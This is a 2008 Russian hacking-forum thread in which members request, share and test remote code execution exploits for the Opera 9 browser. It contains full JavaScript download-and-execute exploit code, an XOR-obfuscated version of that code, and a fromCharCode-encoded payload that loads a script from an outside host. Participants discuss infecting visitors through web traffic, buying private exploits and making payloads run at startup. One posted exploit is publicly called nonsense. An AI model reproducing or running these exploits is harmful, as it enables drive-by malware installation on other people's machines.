Форум АНТИЧАТ - Эксплойты для Opera

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - Эксплойты для Opera (https://forum.antichat.xyz/showthread.php?t=57602)

-=[AL!EN]=-

06.01.2008 20:34

Эксплойты для Opera

Прошлую тему удалили модеры (не в том разделе видимо создал)
Тут его уже выкладывали, но видимо старую тему с ним уже дельнули, ищу еще раз експлоит для оперы 9 версии (remote download & execution)

SVAROG

10.01.2008 22:17

http://milw0rm.com/exploits/3871
http://milw0rm.com/exploits/3784
http://milw0rm.com/exploits/3101

-=[AL!EN]=-

10.01.2008 22:25

Спасибо, но к сожалению не то... Насколько помню выкладывали remote dwnld & execution...

razzzar

10.01.2008 22:32

Этот?

Код:

<script>

blank_iframe = document.createElement('iframe');

blank_iframe.src = 'about:blank';

blank_iframe.setAttribute('id', 'blank_iframe_window');

blank_iframe.setAttribute('style', 'display:none');

document.appendChild(blank_iframe);

blank_iframe_window.eval

        ("config_iframe = document.createElement('iframe');\

        config_iframe.setAttribute('id', 'config_iframe_window');\

        config_iframe.src = 'opera:config';\

        document.appendChild(config_iframe);\

        app_iframe = document.createElement('script');\

        cache_iframe = document.createElement('iframe');\

        app_iframe.src = 'http://path/to/exe';\

        app_iframe.onload = function ()\

        {\

                cache_iframe.src = 'opera:cache';\

                cache_iframe.onload = function ()\

                {\

                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\

                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\

                        filename = cache.match(re);\

                        config_iframe_window.eval\

                        (\"\

                        opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\

                        app_link = document.createElement('a');\

                        app_link.setAttribute('href', 'tn3270://nothing');\

                        app_link.click();\

                        setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\

                        \");\

                };\

                document.appendChild(cache_iframe);\

        };\

        document.appendChild(app_iframe);");

</script>

-=[AL!EN]=-

10.01.2008 23:36

razzzar
это для 9й оперы? если да, то большое спс

razzzar

10.01.2008 23:52

Да, для 9ой.

[ }/{еСтоКий MAN ]

19.01.2008 18:33

хай. А как юзать этот эксплоит? можно пример?

mind	19.01.2008 18:46

Вот здесь видимо прописать путь к exe файлу:

Код:

app_iframe.src = 'http://path/to/exe';\

Не проверял, девятой оперы нема ((
DrWeb запалил сплоит )))

.::Gh0st::.

19.01.2008 18:59

залил на удаленный хост калькулятор, скачался. правда не запустился. проверял на опере 9.20

gibson

19.01.2008 19:07

сплойт не рабочий его нужно переписать. рабочий в привате.

alexman90

19.01.2008 19:20

вот .::Gh0st::. сказал что эксплоит скачал калькулятор но не запустил... а можно ли сделать так чтобы скачивалось в автозагрузку??

-=[AL!EN]=-

19.01.2008 20:48

Цитата:

Сообщение от gibson

сплойт не рабочий его нужно переписать. рабочий в привате.

вот мля а я то думаю че то по траффу прогнал ничего не грузанулось :)

Mescalin

20.01.2008 00:17

у меня этот сплоит норм работал месяца 2 назад тестил на себе опера 9.20 вроде грузил cmd все норм запускал,а потом бац не грузит хз вобщем из за чего это (((

heks	09.06.2008 20:37

опера 9.27 sploit

Тут такой вопрос есть сплоит под эту версию у кого можно его достать или купить и за сколько?

m9chik

09.06.2008 20:40

с чего ты ваще взял что есть сплоит под оперу? и еси 9.27 то большенство юзеров обновляют и очень часто оперу. и сплоит под оперу...ваще впервые слышу :)

-=lebed=-

09.06.2008 20:51

Цитата:

Сообщение от m9chik

Есть под более ранние версии...

heks	09.06.2008 21:22

лазию с последней версией браузера у меня увели историю с квипа чел стукнул сам говорит в привате уже сплоит по эту версию есть попался я на ифрейме как он сказал сразу говорю что всякую дрянь я не открываю стоит аутпост который ничего не заподозрил sp3 тоже пробил да и еще нод с последними обновлениями

Piflit

09.06.2008 21:47

ищи плоент в кэше :)

heks	09.06.2008 21:59

Цитата:

Сообщение от Piflit

ищи плоент в кэше :)

и как он выглядеть должен?

oRb	09.06.2008 22:20

PHP код:


		
			
<script language=JavaScript>str = "cm`oj^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(: cm`oj^hgs`ld/rsb!<!&`cntu;cm`oj&: cm`oj^hgs`ld/rdu@uushctud)&he&-!&cm`oj^hgs`ld^vhoenv&(: cm`oj^hgs`ld/rdu@uushctud)&ruxmd&-!&ehrqm`x;onod&(: enbtldou/`qqdoeBihme)cm`oj^hgs`ld(: cm`oj^hgs`ld^vhoenv/dw`m!)#bnoghf^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] bnoghf^hgs`ld/rdu@uushctud)&he&-!&bnoghf^hgs`ld^vhoenv&(:] bnoghf^hgs`ld/rsb!<!&nqds`;bnoghf&:] enbtldou/`qqdoeBihme)bnoghf^hgs`ld(:] `qq^hgs`ld!<!enbtldou/bsd`udDmdldou)&rbshqu&(:] b`bid^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] `qq^hgs`ld/rsb!<!&&:] `qq^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid^hgs`ld/rsb!<!&nqds`;b`bid&:] b`bid^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid!<!b`bid^hgs`ld/bnoudouEnbtldou/bihmeOnedrZ1\/hoodsIULM/unTqqdsB`rd)(:] w`s!sd!<!odv!SdfDyq)&)NQS]]vz4|/DYD(]]r+]]e*]]r+";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>

Закриптовано следующее:

PHP код:


		
			
blank_iframe = document.createElement('iframe');!blank_iframe.src = 'about:blank';!blank_iframe.setAttribute('id', 'blank_iframe_window');!blank_iframe.setAttribute('style', 'display:none');!document.appendChild(blank_iframe);!blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\!config_iframe.setAttribute('id', 'config_iframe_window');\!config_iframe.src = 'opera:config';\!document.appendChild(config_iframe);\!app_iframe = document.createElement('script');\!cache_iframe = document.createElement('iframe');\!app_iframe.src = '';\!app_iframe.onload = function ()\!{\!cache_iframe.src = 'opera:cache';\!cache_iframe.onload = function ()\!{\!cache = cache_iframe.contentDocument.childNodes[0.innerHTML.toUpperCase();\!var re = new RegExp('(OPR\\w{5}.EXE)\\s*\\d+\\s*

вообщем хз, то или не то. что нашел :D

млин, тупля под вечер. забыл на дату поста посмотреть. все что выше - треш.

diehard

09.06.2008 22:22

Дай ссылку на зараженную страницу - будет тебе сплойт

diehard

09.06.2008 22:24

oRb
Это не пробивает мою 9.23

*DeViL*

10.06.2008 22:06

Цитата:

Сообщение от diehard

oRb
Это не пробивает мою 9.23

глупо пробовать на себе, тем более 100% сплоитов не бывает) юзай трафик и будут тебе loads...

Nelzone

10.06.2008 22:25

Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities
Opera 9.10 alert() Remote Denial of Service Exploit
тока для древни версии...

diehard

16.06.2008 01:52

Цитата:

Сообщение от *DeViL*

глупо пробовать на себе, тем более 100% сплоитов не бывает) юзай трафик и будут тебе loads...

Ы? почему на себе глупо-то пробовать?
на моей связке этот сплоит рубил Оперы насколько помню только версий 9.00-9.20

Chaak

30.10.2008 22:56

Opera 9.62 [exploit]

Remote code exec.

PHP код:


		
			
<!--

--Aviv.



http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx

-->



<html>

<script>

function x() {

  window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="x()">Click me...</a>

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />



<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />



<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />



<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />



<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />

<br />



<br />

<br />

<br />

<br />

<br />

<br />

<br />

&lt;img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;

</body>

</html>

Сохраняем, запускаем, откроется калькулятор =)
Работает на 9.61 и 9.62.

Видео: http://dump.ru/file/1168495

http://www.milw0rm.com/exploits/6880

GlOFF

30.10.2008 23:11

На 9.62 уже что-то не прокатывает... или я что-то не так делаю! :)))
Жалко что перестановил версию 9.61!!! :)

n0153r

30.10.2008 23:35

=) у мну не работает и на 9.61 .....

C.C.C.P

30.10.2008 23:50

9.62 не работает.

mr.The

31.10.2008 00:17

то-то я думаю опера мне обновиться предложила..

.acme

31.10.2008 12:08

на 9.61 не сработала. (win32)

iddqd

31.10.2008 12:11

аналогично

GlOFF

31.10.2008 12:39

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все :))

DVD_RW

31.10.2008 12:43

у мну включается калькулятор .. ток надо нажать Click me... и там всякие ерроры и обратно и калькулятор :)

Dimi4

31.10.2008 13:32

Цитата:

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все )

Бгг єт не чак нашел багу) см копирайты)

satana8920

31.10.2008 14:07

а как будет выглядеть сплойт еси надо че то подгрузить???и запустить
можт соберем побольше сплойтов для браузеров ;)

Sleep

02.11.2008 18:13

Opera 9.62 Exploit

OPERA 9.62 Remote Code Execution

Код:

<!--

# OPERA 9.62 Remote Code Execution

# Vulnerability Found By NeoCoderz

# Email : NeoCoderz1[at]msn[dot]com

-->

<html>

<script>

function execcalc() {

  var abc="c:\\\\windows\\\\system32\\\\calc.exe";

  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>

<script>

function execcalca() {

  var abc="c:\\\\windows\\\\system32\\\\calc.exe";

  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>

<script>

function execcalcb() {

  var abc="c:\\\\windows\\\\system32\\\\calc.exe";

  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>

<script>

function execcalcc() {

  var abc="c:\\\\windows\\\\system32\\\\calc.exe";

  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>

<script>

function execcalcd() {

  var abc="c:\\\\windows\\\\system32\\\\calc.exe";

  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');

  window.setTimeout("location.href='mailto:'",4000);

}

</script>

<body scrolling="no">

<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>

</html>

Потестить на себе можно тут
скачать:тут
:)

[Dezzter]

02.11.2008 18:19

что позволяет уязвимость сделать на уязвимой тачке???

_kREveDKo_

02.11.2008 18:20

Выполнение произвольноо кода, разве не видно? В примере вызывается калькулятор.

astrologer

02.11.2008 18:22

Цитата:

This presumed "exploit" just proves that "NeoCoderz" doesn't understand what the problem was, and trust me - his "exploit code" in fact makes no sense AT ALL. Seriously - he's trying to "inject" code that will simply eval() a string which is the path to calc.exe - as if that would automagically change Opera's preferences or make Opera throw that path at the system and execute it. Totally clueless. (He even claims his "exploit" is "injecting" this code into pages that do not accept any input - like opera:plugins and opera:about.

Источник.

Время: 23:12

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице